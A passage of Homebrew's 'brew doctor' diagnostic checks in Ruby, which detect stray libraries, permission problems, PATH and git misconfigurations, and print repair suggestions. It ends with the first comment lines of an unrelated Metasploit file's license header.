    "macfuse.pc", # OSXFuse MacFuse compatibility layer
    "osxfuse.pc", # OSXFuse
    "libntfs-3g.pc", # NTFS-3G
    "libublio.pc", # NTFS-3G
  ]
  __check_stray_files "/usr/local/lib/pkgconfig", "*.pc", white_list, <<-EOS.undent
    Unbrewed .pc files were found in /usr/local/lib/pkgconfig.
    If you didn't put them there on purpose they could cause problems when
    building Homebrew formulae, and may need to be deleted.
    Unexpected .pc files:
  EOS
end
# Warns about non-Homebrew libtool archives in /usr/local/lib.
def check_for_stray_las
  white_list = [
    "libfuse.la", # MacFuse
    "libfuse_ino64.la", # MacFuse
    "libosxfuse_i32.la", # OSXFuse
    "libosxfuse_i64.la", # OSXFuse
    "libosxfuse.la", # OSXFuse
    "libntfs-3g.la", # NTFS-3G
    "libntfs.la", # NTFS-3G
    "libublio.la", # NTFS-3G
  ]
  __check_stray_files "/usr/local/lib", "*.la", white_list, <<-EOS.undent
    Unbrewed .la files were found in /usr/local/lib.
    If you didn't put them there on purpose they could cause problems when
    building Homebrew formulae, and may need to be deleted.
    Unexpected .la files:
  EOS
end
# Warns about non-Homebrew headers in /usr/local/include.
def check_for_stray_headers
  white_list = [
    "fuse.h", # MacFuse
    "fuse/**/*.h", # MacFuse
    "macfuse/**/*.h", # OSXFuse MacFuse compatibility layer
    "osxfuse/**/*.h", # OSXFuse
    "ntfs/**/*.h", # NTFS-3G
    "ntfs-3g/**/*.h", # NTFS-3G
  ]
  __check_stray_files "/usr/local/include", "**/*.h", white_list, <<-EOS.undent
    Unbrewed header files were found in /usr/local/include.
    If you didn't put them there on purpose they could cause problems when
    building Homebrew formulae, and may need to be deleted.
    Unexpected header files:
  EOS
end
# Walks Homebrew's pruneable directories and reports symlinks whose targets
# no longer exist.
def check_for_broken_symlinks
  broken_symlinks = []
  Keg::PRUNEABLE_DIRECTORIES.each do |d|
    next unless d.directory?
    d.find do |path|
      if path.symlink? && !path.resolved_path_exists?
        broken_symlinks << path
      end
    end
  end
  return if broken_symlinks.empty?
  inject_file_list broken_symlinks, <<-EOS.undent
    Broken symlinks were found. Remove them with `brew prune`:
  EOS
end
# A world-writable temp dir without the sticky bit lets any user delete
# other users' files there; suggest fixing the mode or relocating.
def check_tmpdir_sticky_bit
  world_writable = HOMEBREW_TEMP.stat.mode & 0777 == 0777
  return if !world_writable || HOMEBREW_TEMP.sticky?
  <<-EOS.undent
    #{HOMEBREW_TEMP} is world-writable but does not have the sticky bit set.
    Please execute `sudo chmod +t #{HOMEBREW_TEMP}` in your Terminal.
    Alternatively, if you don't have administrative privileges on this
    machine, point the HOMEBREW_TEMP environment variable to a directory
    you control, e.g. `mkdir ~/tmp; chmod 755 ~/tmp; export HOMEBREW_TEMP=~/tmp`.
  EOS
end
# Warns when the Homebrew repository itself is not writable by this user.
def check_access_homebrew_repository
  return if HOMEBREW_REPOSITORY.writable_real?
  <<-EOS.undent
    #{HOMEBREW_REPOSITORY} is not writable.
    You should change the ownership and permissions of #{HOMEBREW_REPOSITORY}
    back to your user account.
    sudo chown -R $(whoami) #{HOMEBREW_REPOSITORY}
  EOS
end
# Warns when any existing top-level prefix directory is not writable.
def check_access_prefix_directories
  not_writable_dirs = []
  Keg::ALL_TOP_LEVEL_DIRECTORIES.each do |dir|
    path = HOMEBREW_PREFIX/dir
    next unless path.exist?
    next if path.writable_real?
    not_writable_dirs << path
  end
  return if not_writable_dirs.empty?
  <<-EOS.undent
    The following directories are not writable:
    #{not_writable_dirs.join("\n")}
    This can happen if you "sudo make install" software that isn't managed
    by Homebrew. If a formula tries to write a file to this directory, the
    install will fail during the link step.
    You should change the ownership and permissions of these directories.
    back to your user account.
    sudo chown -R $(whoami) #{not_writable_dirs.join(" ")}
  EOS
end
# Warns when Homebrew's Python site-packages is not writable.
def check_access_site_packages
  return unless Language::Python.homebrew_site_packages.exist?
  return if Language::Python.homebrew_site_packages.writable_real?
  <<-EOS.undent
    #{Language::Python.homebrew_site_packages} isn't writable.
    This can happen if you "sudo pip install" software that isn't managed
    by Homebrew. If you install a formula with Python modules, the install
    will fail during the link step.
    You should change the ownership and permissions of #{Language::Python.homebrew_site_packages}
    back to your user account.
    sudo chown -R $(whoami) #{Language::Python.homebrew_site_packages}
  EOS
end
# Warns when the lock directory is not writable.
def check_access_lock_dir
  return unless HOMEBREW_LOCK_DIR.exist?
  return if HOMEBREW_LOCK_DIR.writable_real?
  <<-EOS.undent
    #{HOMEBREW_LOCK_DIR} isn't writable.
    Homebrew writes lock files to this location.
    You should change the ownership and permissions of #{HOMEBREW_LOCK_DIR}
    back to your user account.
    sudo chown -R $(whoami) #{HOMEBREW_LOCK_DIR}
  EOS
end
# Warns when the logs directory is not writable.
def check_access_logs
  return unless HOMEBREW_LOGS.exist?
  return if HOMEBREW_LOGS.writable_real?
  <<-EOS.undent
    #{HOMEBREW_LOGS} isn't writable.
    Homebrew writes debugging logs to this location.
    You should change the ownership and permissions of #{HOMEBREW_LOGS}
    back to your user account.
    sudo chown -R $(whoami) #{HOMEBREW_LOGS}
  EOS
end
# Warns when the download cache is not writable.
def check_access_cache
  return unless HOMEBREW_CACHE.exist?
  return if HOMEBREW_CACHE.writable_real?
  <<-EOS.undent
    #{HOMEBREW_CACHE} isn't writable.
    This can happen if you run `brew install` or `brew fetch` as another user.
    Homebrew caches downloaded files to this location.
    You should change the ownership and permissions of #{HOMEBREW_CACHE}
    back to your user account.
    sudo chown -R $(whoami) #{HOMEBREW_CACHE}
  EOS
end
# Warns when the Cellar is not writable.
def check_access_cellar
  return unless HOMEBREW_CELLAR.exist?
  return if HOMEBREW_CELLAR.writable_real?
  <<-EOS.undent
    #{HOMEBREW_CELLAR} isn't writable.
    You should change the ownership and permissions of #{HOMEBREW_CELLAR}
    back to your user account.
    sudo chown -R $(whoami) #{HOMEBREW_CELLAR}
  EOS
end
# Warns when Cellar directories exist under both the prefix and repository.
def check_multiple_cellars
  return if HOMEBREW_PREFIX.to_s == HOMEBREW_REPOSITORY.to_s
  return unless (HOMEBREW_REPOSITORY/"Cellar").exist?
  return unless (HOMEBREW_PREFIX/"Cellar").exist?
  <<-EOS.undent
    You have multiple Cellars.
    You should delete #{HOMEBREW_REPOSITORY}/Cellar:
    rm -rf #{HOMEBREW_REPOSITORY}/Cellar
  EOS
end
end
# Scans PATH order, warning when /usr/bin shadows Homebrew's bin for tools
# installed in both. NOTE: communicates with check_user_path_2/3 through the
# globals $seen_prefix_bin/$seen_prefix_sbin, so it must run before them.
def check_user_path_1
  $seen_prefix_bin = false
  $seen_prefix_sbin = false
  message = ""
  paths(ENV["HOMEBREW_PATH"]).each do |p|
    case p
    when "/usr/bin"
      unless $seen_prefix_bin
        # only show the doctor message if there are any conflicts
        # rationale: a default install should not trigger any brew doctor messages
        conflicts = Dir["#{HOMEBREW_PREFIX}/bin/*"]
                    .map { |fn| File.basename fn }
                    .select { |bn| File.exist? "/usr/bin/#{bn}" }
        unless conflicts.empty?
          message = inject_file_list conflicts, <<-EOS.undent
            /usr/bin occurs before #{HOMEBREW_PREFIX}/bin
            This means that system-provided programs will be used instead of those
            provided by Homebrew. The following tools exist at both paths:
          EOS
          message += <<-EOS.undent
            Consider setting your PATH so that #{HOMEBREW_PREFIX}/bin
            occurs before /usr/bin. Here is a one-liner:
            #{Utils::Shell.prepend_path_in_profile("#{HOMEBREW_PREFIX}/bin")}
          EOS
        end
      end
    when "#{HOMEBREW_PREFIX}/bin"
      $seen_prefix_bin = true
    when "#{HOMEBREW_PREFIX}/sbin"
      $seen_prefix_sbin = true
    end
  end
  message unless message.empty?
end
# Warns when Homebrew's bin was never seen on PATH (relies on the global
# set by check_user_path_1, which must run first).
def check_user_path_2
  return if $seen_prefix_bin
  <<-EOS.undent
    Homebrew's bin was not found in your PATH.
    Consider setting the PATH for example like so
    #{Utils::Shell.prepend_path_in_profile("#{HOMEBREW_PREFIX}/bin")}
  EOS
end
# Warns when sbin is populated but missing from PATH (same global protocol).
def check_user_path_3
  return if $seen_prefix_sbin
  # Don't complain about sbin not being in the path if it doesn't exist
  sbin = HOMEBREW_PREFIX/"sbin"
  return unless sbin.directory? && !sbin.children.empty?
  <<-EOS.undent
    Homebrew's sbin was not found in your PATH but you have installed
    formulae that put executables in #{HOMEBREW_PREFIX}/sbin.
    Consider setting the PATH for example like so
    #{Utils::Shell.prepend_path_in_profile("#{HOMEBREW_PREFIX}/sbin")}
  EOS
end
# Warns when XDG_DATA_DIRS is customized but omits Homebrew's share dir.
# An unset or empty variable is fine (defaults include the prefix).
def check_xdg_data_dirs
  share = "#{HOMEBREW_PREFIX}/share"
  homebrew_in_xdg_data_dirs =
    !ENV["XDG_DATA_DIRS"] || ENV["XDG_DATA_DIRS"] == "" ||
    ENV["XDG_DATA_DIRS"].split(File::PATH_SEPARATOR).include?(share)
  return if homebrew_in_xdg_data_dirs
  <<-EOS.undent
    Homebrew's share was not found in your XDG_DATA_DIRS but you have
    this variable set to include other locations.
    Some programs like `vapigen` may not work correctly.
    Consider setting the XDG_DATA_DIRS for example like so
    echo 'export XDG_DATA_DIRS="#{share}:$XDG_DATA_DIRS"' >> #{Utils::Shell.shell_profile}
  EOS
end
# Warns when a .curlrc exists (in CURL_HOME or HOME) since it can break
# Homebrew downloads.
def check_user_curlrc
  curlrc_found = %w[CURL_HOME HOME].any? do |var|
    ENV[var] && File.exist?("#{ENV[var]}/.curlrc")
  end
  return unless curlrc_found
  <<-EOS.undent
    You have a curlrc file
    If you have trouble downloading packages with Homebrew, then maybe this
    is the problem? If the following command doesn't work, then try removing
    your curlrc:
    curl #{Formatter.url("https://github.com")}
  EOS
end
# Warns about stray gettext libraries/headers in system prefixes unless they
# all belong to a linked Homebrew gettext keg.
def check_for_gettext
  return unless OS.mac?
  find_relative_paths("lib/libgettextlib.dylib",
                      "lib/libintl.dylib",
                      "include/libintl.h")
  return if @found.empty?
  # Our gettext formula will be caught by check_linked_keg_only_brews
  gettext = begin
    Formulary.factory("gettext")
  rescue
    nil
  end
  homebrew_owned = @found.all? do |path|
    Pathname.new(path).realpath.to_s.start_with? "#{HOMEBREW_CELLAR}/gettext"
  end
  return if gettext && gettext.linked_keg.directory? && homebrew_owned
  inject_file_list @found, <<-EOS.undent
    gettext files detected at a system prefix.
    These files can cause compilation and link failures, especially if they
    are compiled with improper architectures. Consider removing these files:
  EOS
end
# Warns about libiconv outside /usr: a linked non-keg-only formula is an
# error, otherwise the stray files themselves are reported.
def check_for_iconv
  return unless OS.mac?
  find_relative_paths("lib/libiconv.dylib", "include/iconv.h")
  return if @found.empty?
  libiconv = begin
    Formulary.factory("libiconv")
  rescue
    nil
  end
  if libiconv && libiconv.linked_keg.directory?
    unless libiconv.keg_only?
      <<-EOS.undent
        A libiconv formula is installed and linked.
        This will break stuff. For serious. Unlink it.
      EOS
    end
  else
    inject_file_list @found, <<-EOS.undent
      libiconv files detected at a system prefix other than /usr.
      Homebrew doesn't provide a libiconv formula, and expects to link against
      the system version in /usr. libiconv in other prefixes can cause
      compile or link failure, especially if compiled with improper
      architectures. macOS itself never installs anything to /usr/local so
      it was either installed by a user or some other third party software.
      tl;dr: delete these files:
    EOS
  end
end
# Finds *-config scripts on PATH outside system/Homebrew locations, which
# can mislead `./configure` runs.
def check_for_config_scripts
  return unless HOMEBREW_CELLAR.exist?
  real_cellar = HOMEBREW_CELLAR.realpath
  scripts = []
  # Directories where config scripts are expected and harmless.
  whitelist = %W[
    /usr/bin /usr/sbin
    /usr/X11/bin /usr/X11R6/bin /opt/X11/bin
    #{HOMEBREW_PREFIX}/bin #{HOMEBREW_PREFIX}/sbin
    /Applications/Server.app/Contents/ServerRoot/usr/bin
    /Applications/Server.app/Contents/ServerRoot/usr/sbin
  ].map(&:downcase)
  paths(ENV["HOMEBREW_PATH"]).each do |p|
    next if whitelist.include?(p.downcase) || !File.directory?(p)
    # Skip PATH entries that resolve into the Cellar.
    realpath = Pathname.new(p).realpath.to_s
    next if realpath.start_with?(real_cellar.to_s, HOMEBREW_CELLAR.to_s)
    scripts += Dir.chdir(p) { Dir["*-config"] }.map { |c| File.join(p, c) }
  end
  return if scripts.empty?
  inject_file_list scripts, <<-EOS.undent
    "config" scripts exist outside your system or Homebrew directories.
    `./configure` scripts often look for *-config scripts to determine if
    software packages are installed, and what additional flags to use when
    compiling and linking.
    Having additional scripts in your path can confuse software installed via
    Homebrew if the config script overrides a system or Homebrew provided
    script of the same name. We found the following "config" scripts:
  EOS
end
# Warns about DYLD_*/LD_* environment variables, which break dynamic
# linking; DYLD_INSERT_LIBRARIES gets an extra note about Go builds.
def check_dyld_vars
  dyld = OS.mac? ? "DYLD" : "LD"
  dyld_vars = ENV.keys.grep(/^#{dyld}_/)
  return if dyld_vars.empty?
  values = dyld_vars.map { |var| "#{var}: #{ENV.fetch(var)}" }
  message = inject_file_list values, <<-EOS.undent
    Setting #{dyld}_* vars can break dynamic linking.
    Set variables:
  EOS
  if dyld_vars.include? "DYLD_INSERT_LIBRARIES"
    message += <<-EOS.undent
      Setting DYLD_INSERT_LIBRARIES can cause Go builds to fail.
      Having this set is common if you use this software:
      #{Formatter.url("https://asepsis.binaryage.com/")}
    EOS
  end
  message
end
# Warns when SSL_CERT_FILE is set: the system curl then uses a
# non-system certificate store, which can break downloads.
# Returns a warning string, or nil when the variable is unset.
def check_ssl_cert_file
  return unless ENV.include?("SSL_CERT_FILE")

  <<-EOS.undent
    Setting SSL_CERT_FILE can break downloading files; if that happens
    you should unset it before running Homebrew.
    Homebrew uses the system curl which uses system certificates by
    default. Setting SSL_CERT_FILE makes it use an outdated OpenSSL, which
    does not support modern OpenSSL certificate stores.
  EOS
end
# Warns when the Cellar directory is itself a symlink; overlapping
# install locations then collide during the linking step.
# Returns nil when the Cellar is absent or a real directory.
def check_for_symlinked_cellar
  return unless HOMEBREW_CELLAR.exist? && HOMEBREW_CELLAR.symlink?

  <<-EOS.undent
    Symlinked Cellars can cause problems.
    Your Homebrew Cellar is a symlink: #{HOMEBREW_CELLAR}
    which resolves to: #{HOMEBREW_CELLAR.realpath}
    The recommended Homebrew installations are either:
    (A) Have Cellar be a real directory inside of your HOMEBREW_PREFIX
    (B) Symlink "bin/brew" into your prefix, but don't symlink "Cellar".
    Older installations of Homebrew may have created a symlinked Cellar, but this can
    cause problems when two formula install to locations that are mapped on top of each
    other during the linking step.
  EOS
end
# Warns when the Cellar and HOMEBREW_TEMP resolve to different volumes;
# macOS cannot move relative symlinks across volumes. macOS-only check.
# Returns a warning string or nil.
def check_for_multiple_volumes
return unless OS.mac?
return unless HOMEBREW_CELLAR.exist?
volumes = Volumes.new
# Find the volumes for the TMP folder & HOMEBREW_CELLAR
real_cellar = HOMEBREW_CELLAR.realpath
where_cellar = volumes.which real_cellar
begin
# Create (and always remove) a probe directory to learn which volume
# HOMEBREW_TEMP actually lives on.
tmp = Pathname.new(Dir.mktmpdir("doctor", HOMEBREW_TEMP))
begin
real_tmp = tmp.realpath.parent
where_tmp = volumes.which real_tmp
ensure
Dir.delete tmp
end
rescue
# Probing TEMP failed (e.g. unwritable); silently skip this check.
return
end
return if where_cellar == where_tmp
<<-EOS.undent
Your Cellar and TEMP directories are on different volumes.
macOS won't move relative symlinks across volumes unless the target file already
exists. Brews known to be affected by this are Git and Narwhal.
You should set the "HOMEBREW_TEMP" environmental variable to a suitable
directory on the same volume as your Cellar.
EOS
end
# Warns when the git on PATH is older than 1.8.5 (required for HTTPS
# checkouts from GitHub and for `git -C`). Returns a warning string or nil.
def check_git_version
# https://help.github.com/articles/https-cloning-errors
return unless Utils.git_available?
return unless Version.create(Utils.git_version) < Version.create("1.8.5")
git = Formula["git"]
# Suggest `upgrade` when a brewed git is already installed, else `install`.
git_upgrade_cmd = git.any_version_installed? ? "upgrade" : "install"
<<-EOS.undent
An outdated version (#{Utils.git_version}) of Git was detected in your PATH.
Git 1.8.5 or newer is required to perform checkouts over HTTPS from GitHub and
to support the 'git -C <path>' option.
Please upgrade:
brew #{git_upgrade_cmd} git
EOS
end
# Warns when git cannot be found on PATH; Homebrew needs it internally
# and for VCS-based formulae. Returns nil when git is available.
def check_for_git
  unless Utils.git_available?
    <<-EOS.undent
      Git could not be found in your PATH.
      Homebrew uses Git for several internal functions, and some formulae use Git
      checkouts instead of stable tarballs. You may want to install Git:
      brew install git
    EOS
  end
end
# Warns when git's core.autocrlf is "true": newline rewriting on checkout
# corrupts Homebrew's working tree. Returns a warning string or nil.
def check_git_newline_settings
return unless Utils.git_available?
# Read the effective setting from within the Homebrew repository.
autocrlf = HOMEBREW_REPOSITORY.cd { `git config --get core.autocrlf`.chomp }
return unless autocrlf == "true"
<<-EOS.undent
Suspicious Git newline settings found.
The detected Git newline settings will cause checkout problems:
core.autocrlf = #{autocrlf}
If you are not routinely dealing with Windows-based projects,
consider removing these by running:
git config --global core.autocrlf input
EOS
end
# Checks that the Homebrew/brew checkout has an origin remote pointing at
# the canonical repository. Returns a warning string or nil.
def check_brew_git_origin
return if !Utils.git_available? || !(HOMEBREW_REPOSITORY/".git").exist?
origin = HOMEBREW_REPOSITORY.git_origin
remote = "https://github.com/#{OS::GITHUB_USER}/brew.git"
if origin.nil?
# No origin remote configured at all.
<<-EOS.undent
Missing Homebrew/brew git origin remote.
Without a correctly configured origin, Homebrew won't update
properly. You can solve this by adding the Homebrew remote:
git -C "#{HOMEBREW_REPOSITORY}" remote add origin #{Formatter.url(remote)}
EOS
elsif origin !~ %r{(Homebrew|Linuxbrew)/brew(\.git)?$}
# Origin exists but does not look like the official repository.
<<-EOS.undent
Suspicious Homebrew/brew git origin remote found.
With a non-standard origin, Homebrew won't pull updates from
the main repository. The current git origin is:
#{origin}
Unless you have compelling reasons, consider setting the
origin remote to point at the main repository by running:
git -C "#{HOMEBREW_REPOSITORY}" remote add origin #{Formatter.url(remote)}
EOS
end
end
# Same origin-remote check as check_brew_git_origin, but for the
# homebrew-core tap checkout. Returns a warning string or nil.
def check_coretap_git_origin
coretap_path = CoreTap.instance.path
return if !Utils.git_available? || !(coretap_path/".git").exist?
origin = coretap_path.git_origin
remote = "https://github.com/#{OS::GITHUB_USER}/homebrew-core.git"
if origin.nil?
# No origin remote configured at all.
<<-EOS.undent
Missing #{CoreTap.instance} git origin remote.
Without a correctly configured origin, Homebrew won't update
properly. You can solve this by adding the Homebrew remote:
git -C "#{coretap_path}" remote add origin #{Formatter.url(remote)}
EOS
elsif origin !~ %r{(Homebrew|Linuxbrew)/homebrew-core(\.git|/)?$}
# Origin exists but does not look like the official repository.
<<-EOS.undent
Suspicious #{CoreTap.instance} git origin remote found.
With a non-standard origin, Homebrew won't pull updates from
the main repository. The current git origin is:
#{origin}
Unless you have compelling reasons, consider setting the
origin remote to point at the main repository by running:
git -C "#{coretap_path}" remote add origin #{Formatter.url(remote)}
EOS
end
end
# Returns true when any file from any installed keg of formula +f+ is
# currently symlinked into HOMEBREW_PREFIX, false otherwise.
def __check_linked_brew(f)
f.installed_prefixes.each do |prefix|
prefix.find do |src|
next if src == prefix
dst = HOMEBREW_PREFIX + src.relative_path_from(prefix)
# A link only counts if it points back at this keg's own file.
# Note: `return` exits the whole method from inside Pathname#find.
return true if dst.symlink? && src == dst.resolved_path
end
end
false
end
# Warns when keg-only formulae are nevertheless linked into the prefix,
# where other builds' `./configure` runs can detect them.
# Returns a warning string or nil.
def check_for_linked_keg_only_brews
return unless HOMEBREW_CELLAR.exist?
linked = Formula.installed.select do |f|
f.keg_only? && __check_linked_brew(f)
end
return if linked.empty?
inject_file_list linked.map(&:full_name), <<-EOS.undent
Some keg-only formula are linked into the Cellar.
Linking a keg-only formula, such as gettext, into the cellar with
`brew link <formula>` will cause other formulae to detect them during
the `./configure` step. This may cause problems when compiling those
other formulae.
Binaries provided by keg-only formulae may override system binaries
with other strange results.
You may wish to `brew unlink` these brews:
EOS
end
# Warns about /Library/Frameworks entries (expat, libexpat, libcurl)
# known to derail CMake builds. Returns a warning string or nil.
def check_for_other_frameworks
  # Other frameworks that are known to cause problems when present
  problematic = %w[
    expat.framework
    libexpat.framework
    libcurl.framework
  ]
  found = []
  problematic.each do |framework|
    path = "/Library/Frameworks/#{framework}"
    found << path if File.exist? path
  end
  return if found.empty?

  inject_file_list found, <<-EOS.undent
    Some frameworks can be picked up by CMake's build system and likely
    cause the build to fail. To compile CMake, you may wish to move these
    out of the way:
  EOS
end
# Warns when TMPDIR points at a path that is not an existing directory.
# Returns a warning string, or nil when TMPDIR is unset or valid.
def check_tmpdir
  tmpdir = ENV["TMPDIR"]
  return if tmpdir.nil?
  return if File.directory?(tmpdir)

  <<-EOS.undent
    TMPDIR #{tmpdir.inspect} doesn't exist.
  EOS
end
# Verifies that HOMEBREW_TEMP permits executing programs (it may be
# mounted "noexec") by running a tiny generated shell script there.
# Returns a warning string or nil.
def check_tmpdir_executable
Tempfile.open("homebrew_check_tmpdir_executable", HOMEBREW_TEMP) do |f|
f.write "#!/bin/sh\n"
f.chmod 0700
f.close
# `system` returns false/nil when the script cannot be executed.
unless system f.path
<<-EOS.undent
The directory #{HOMEBREW_TEMP} does not permit executing
programs. It is likely mounted "noexec". Please set HOMEBREW_TEMP
in your #{shell_profile} to a different directory.
export HOMEBREW_TEMP=~/tmp
echo 'export HOMEBREW_TEMP=~/tmp' >> #{shell_profile}
EOS
end
end
end
# Warns when installed formulae have dependencies that are not installed.
# Returns a warning string listing them, or nil.
def check_missing_deps
return unless HOMEBREW_CELLAR.exist?
missing = Set.new
Homebrew::Diagnostic.missing_deps(Formula.installed).each_value do |deps|
missing.merge(deps)
end
return if missing.empty?
<<-EOS.undent
Some installed formula are missing dependencies.
You should `brew install` the missing dependencies:
brew install #{missing.sort_by(&:full_name) * " "}
Run `brew missing` for more details.
EOS
end
# Warns when Library/Homebrew contains uncommitted or untracked changes.
# Returns a warning string or nil.
# NOTE(review): the status check runs in HOMEBREW_REPOSITORY while the
# suggested command cds into HOMEBREW_LIBRARY -- confirm both resolve to
# the same git checkout.
def check_git_status
return unless Utils.git_available?
HOMEBREW_REPOSITORY.cd do
# Clean tree: `return` here exits the whole method with nil.
return if `git status --untracked-files=all --porcelain -- Library/Homebrew/ 2>/dev/null`.chomp.empty?
end
<<-EOS.undent
You have uncommitted modifications to Homebrew
If this is a surprise to you, then you should stash these modifications.
Stashing returns Homebrew to a pristine state but can be undone
should you later need to do so for some reason.
cd #{HOMEBREW_LIBRARY} && git stash && git clean -d -f
EOS
end
# Warns when Enthought Python's `enpkg` is on PATH; it ships its own
# iconv/libxml2 copies that confuse other build systems.
# Returns a warning string or nil.
def check_for_enthought_python
  return if which("enpkg").nil?

  <<-EOS.undent
    Enthought Python was found in your PATH.
    This can cause build problems, as this software installs its own
    copies of iconv and libxml2 into directories that are picked up by
    other build systems.
  EOS
end
# Warns when a Python.framework is installed under /Library, which can
# interfere with system or brewed Pythons. Returns a warning string or nil.
def check_for_library_python
  framework = "/Library/Frameworks/Python.framework"
  return unless File.exist?(framework)

  <<-EOS.undent
    Python is installed at /Library/Frameworks/Python.framework
    Homebrew only supports building against the System-provided Python or a
    brewed Python. In particular, Pythons installed to /Library can interfere
    with other software installs.
  EOS
end
# Warns when the legacy #{HOMEBREW_PREFIX}/share/python or .../python3
# directories are still on PATH; pip scripts now install into
# #{HOMEBREW_PREFIX}/bin. Returns a warning string or nil.
def check_for_old_homebrew_share_python_in_path
  message = ""
  # `each` (not `map`): we only accumulate into `message`, the block's
  # result is irrelevant. The original used `map` and discarded it.
  ["", "3"].each do |suffix|
    next unless paths.include?((HOMEBREW_PREFIX/"share/python#{suffix}").to_s)
    message += <<-EOS.undent
      #{HOMEBREW_PREFIX}/share/python#{suffix} is not needed in PATH.
    EOS
  end
  # Nothing matched: return nil, same contract as before.
  return if message.empty?
  message += <<-EOS.undent
    Formerly homebrew put Python scripts you installed via `pip` or `pip3`
    (or `easy_install`) into that directory above but now it can be removed
    from your PATH variable.
    Python scripts will now install into #{HOMEBREW_PREFIX}/bin.
    You can delete anything, except 'Extras', from the #{HOMEBREW_PREFIX}/share/python
    (and #{HOMEBREW_PREFIX}/share/python3) dir and install affected Python packages
    anew with `pip install --upgrade`.
  EOS
  message
end
# Warns when `python` reports a major version other than 2, i.e. the
# binary is symlinked to python3. Returns a warning string or nil.
def check_for_bad_python_symlink
return unless which "python"
# Populates $1 with the major version on a successful match.
`python -V 2>&1` =~ /Python (\d+)\./
# This won't be the right warning if we matched nothing at all
return if $1.nil?
return if $1 == "2"
<<-EOS.undent
python is symlinked to python#{$1}
This will confuse build scripts and in general lead to subtle breakage.
EOS
end
# Warns when GNU coreutils' unprefixed gnubin directories are on PATH,
# which is known to break gmp builds. Returns a warning string or nil.
def check_for_non_prefixed_coreutils
coreutils = Formula["coreutils"]
return unless coreutils.any_version_installed?
gnubin = %W[#{coreutils.opt_libexec}/gnubin #{coreutils.libexec}/gnubin]
return if (paths & gnubin).empty?
<<-EOS.undent
Putting non-prefixed coreutils in your path can cause gmp builds to fail.
EOS
rescue FormulaUnavailableError
# No coreutils formula available: nothing to check, return nil.
end
# Warns when GNU findutils is installed with default (unprefixed) names
# or its gnubin directories are on PATH; known to break python builds.
# macOS-only. Returns a warning string or nil.
def check_for_non_prefixed_findutils
return unless OS.mac?
findutils = Formula["findutils"]
return unless findutils.any_version_installed?
gnubin = %W[#{findutils.opt_libexec}/gnubin #{findutils.libexec}/gnubin]
# "default-names" means the formula was built without the g-prefix.
default_names = Tab.for_name("findutils").with? "default-names"
return if !default_names && (paths & gnubin).empty?
<<-EOS.undent
Putting non-prefixed findutils in your path can cause python builds to fail.
EOS
rescue FormulaUnavailableError
# No findutils formula available: nothing to check, return nil.
end
# Warns when ~/.pydistutils.cfg exists; it can break Python builds.
# Returns a warning string or nil.
def check_for_pydistutils_cfg_in_home
  cfg_path = "#{ENV["HOME"]}/.pydistutils.cfg"
  return unless File.exist? cfg_path

  <<-EOS.undent
    A .pydistutils.cfg file was found in $HOME, which may cause Python
    builds to fail. See:
    #{Formatter.url("https://bugs.python.org/issue6138")}
    #{Formatter.url("https://bugs.python.org/issue4655")}
  EOS
end
# Warns about Cellar racks that are neither linked into the prefix nor
# keg-only (i.e. they should be linked but are not).
# Returns a warning string or nil.
def check_for_unlinked_but_not_keg_only
unlinked = Formula.racks.reject do |rack|
if !(HOMEBREW_LINKED_KEGS/rack.basename).directory?
begin
# Keep only racks that are legitimately unlinked (keg-only).
Formulary.from_rack(rack).keg_only?
rescue FormulaUnavailableError, TapFormulaAmbiguityError, TapFormulaWithOldnameAmbiguityError
# Unresolvable racks are treated as not keg-only and stay listed.
false
end
else
# Already linked: drop from the list.
true
end
end.map(&:basename)
return if unlinked.empty?
inject_file_list unlinked, <<-EOS.undent
You have unlinked kegs in your Cellar
Leaving kegs unlinked can lead to build-trouble and cause brews that depend on
those kegs to fail to run properly once built. Run `brew link` on these:
EOS
end
# Warns when the obsolete HOMEBREW_KEEP_INFO variable is still set.
# Returns a warning string, or nil when the variable is unset.
def check_for_old_env_vars
  return if ENV["HOMEBREW_KEEP_INFO"].nil?

  <<-EOS.undent
    `HOMEBREW_KEEP_INFO` is no longer used
    info files are no longer deleted by default; you may
    remove this environment variable.
  EOS
end
# Warns when the default `python` does not honour .pth files in Homebrew's
# site-packages, which breaks imports of brewed Python modules.
# Returns a warning string or nil.
def check_for_pth_support
homebrew_site_packages = Language::Python.homebrew_site_packages
return unless homebrew_site_packages.directory?
# reads_brewed_pth_files? may return nil for "unknown"; only a definite
# false triggers the warning.
return if Language::Python.reads_brewed_pth_files?("python") != false
return unless Language::Python.in_sys_path?("python", homebrew_site_packages)
user_site_packages = Language::Python.user_site_packages "python"
<<-EOS.undent
Your default Python does not recognize the Homebrew site-packages
directory as a special site-packages directory, which means that .pth
files will not be followed. This means you will not be able to import
some modules after installing them with Homebrew, like wxpython. To fix
this for the current user, you can run:
mkdir -p #{user_site_packages}
echo 'import site; site.addsitedir("#{homebrew_site_packages}")' >> #{user_site_packages}/homebrew.pth
EOS
end
# Warns when several external `brew-*` commands on PATH share the same
# command name. Returns a warning string or nil.
def check_for_external_cmd_name_conflict
  external_cmds = paths.flat_map { |p| Dir["#{p}/brew-*"] }.uniq
  external_cmds.select! { |cmd| File.file?(cmd) && File.executable?(cmd) }
  # Command name is the basename with any trailing ".rb" stripped.
  conflicts = external_cmds.group_by { |cmd| File.basename(cmd, ".rb") }
  conflicts.reject! { |_cmd_name, cmd_paths| cmd_paths.size == 1 }
  return if conflicts.empty?

  message = "You have external commands with conflicting names.\n"
  conflicts.each do |cmd_name, cmd_paths|
    message += inject_file_list cmd_paths, <<-EOS.undent
      Found command `#{cmd_name}` in following places:
    EOS
  end
  message
end
# Warns about .rb files found in a tap's potential formula directories
# other than the tap's canonical formula directory.
# Returns a joined warning string or nil.
def check_for_tap_ruby_files_locations
bad_tap_files = {}
Tap.each do |tap|
unused_formula_dirs = tap.potential_formula_dirs - [tap.formula_dir]
unused_formula_dirs.each do |dir|
next unless dir.exist?
dir.children.each do |path|
next unless path.extname == ".rb"
bad_tap_files[tap] ||= []
bad_tap_files[tap] << path
end
end
end
return if bad_tap_files.empty?
# One paragraph per offending tap, joined with blank lines.
bad_tap_files.keys.map do |tap|
<<-EOS.undent
Found Ruby file outside #{tap} tap formula directory
(#{tap.formula_dir}):
#{bad_tap_files[tap].join("\n ")}
EOS
end.join("\n")
end
# Names (as strings) of every check_* diagnostic method on this object.
def all
  methods.map(&:to_s).select { |name| name.start_with?("check_") }
end
end # end class Checks
end
end
require "extend/os/diagnostic"
| 35.834081 | 114 | 0.615292 |
e27e69526b9cfbb02de765f652558694c52bfe99 | 1,794 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
